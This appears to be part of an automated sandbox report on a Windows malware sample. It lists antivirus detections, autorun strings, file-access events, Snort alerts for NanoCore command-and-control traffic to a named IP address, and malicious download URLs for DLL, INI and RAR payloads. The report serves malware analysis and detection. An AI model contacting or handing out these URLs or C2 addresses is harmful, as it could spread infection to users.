            Source: 21.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.8.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.8.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.21.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.2.Synaptics.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 19.0.dhcpmon.exe.e20000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.14.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.14.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.16.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.21.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.26.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.26.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.26.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.26.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.26.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpackAvira: Label: TR/NanoCore.fadte
            Source: 23.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 19.2.dhcpmon.exe.e20000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 20.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.6.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.6.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.16.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.16.unpackAvira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.16.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 9.0.WINDOWS.EXE.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 9.0.WINDOWS.EXE.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 9.0.WINDOWS.EXE.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.10.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.10.unpackAvira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.10.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: y8kdmHi6x3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49765 version: TLS 1.2
            Source: y8kdmHi6x3.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: y8kdmHi6x3.exeBinary or memory string: autorun.inf
            Source: y8kdmHi6x3.exeBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: WINDOWS.EXEBinary or memory string: autorun.inf
            Source: WINDOWS.EXEBinary or memory string: [autorun]
            Source: WINDOWS.EXE, 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: [autorun]
            Source: WINDOWS.EXE, 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: [autorun]
            Source: WINDOWS.EXE, 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,4_2_004099E0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,4_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C

            Networking

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49751 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49755 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49757 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49783 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49785 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49786 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49804 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49812 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49829 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49848 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49853 -> 54.38.136.57:53811
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49855 -> 54.38.136.57:53811
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 54.38.136.57 ports 48129,1,2,8808,4,8,53811,9
            Uses dynamic DNS services
            Source: unknownDNS query: name: freedns.afraid.org
            Source: global trafficTCP traffic: 192.168.2.3:49749 -> 54.38.136.57:48129
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978$1
            Source: SYSTEM32.EXEString found in binary or memory: http://schemas.microsof
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0/
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
